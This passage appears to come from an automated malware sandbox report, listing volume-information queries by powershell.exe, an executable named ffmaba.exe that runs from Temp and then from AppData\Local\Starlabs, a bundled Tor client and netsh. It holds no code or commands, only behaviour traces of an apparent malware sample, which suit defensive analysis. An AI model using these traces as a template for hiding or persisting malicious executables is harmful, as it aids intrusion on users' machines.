Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ffmaba.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Queries volume information: C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
